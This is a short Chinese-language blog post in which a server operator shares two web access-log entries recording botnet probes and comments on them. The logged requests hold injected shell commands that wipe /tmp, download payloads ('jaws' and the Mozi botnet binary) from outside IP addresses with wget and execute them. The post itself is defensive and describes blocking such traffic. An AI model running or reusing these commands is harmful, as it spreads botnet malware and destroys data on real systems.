兩個 weblog:
187.170.221.35 - - [19/Mar/2022:17:46:12 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 404 214 "-" "Hello, world"
58.255.12.253 - - [19/Mar/2022:20:47:57 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://58.255.12.253:33418/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 214 "-" "Hello, world"
第一個連到 31.210.20.109 下載 jawa, 連過去一看是一堆 shell script
跟之前同樣類型的都是要執行 .x86, .mips, .mpsl, .arm, .ppc, .m68k之類的東西, 查了一下這些副檔名都是 CPU 型號名稱, 想下載回來研究但都被防毒軟體先擋下
第二個連到 58.255.12.253 下載 Mozi.a 的東西, 查了一下是網路殭屍病毒, 想下載回來研究但被防毒軟體先擋下
由於這些攻擊常來自不同的 IP, 所以光是擋 IP是擋不完, 只能從網站伺服器存取規則來阻擋
沒有留言:
張貼留言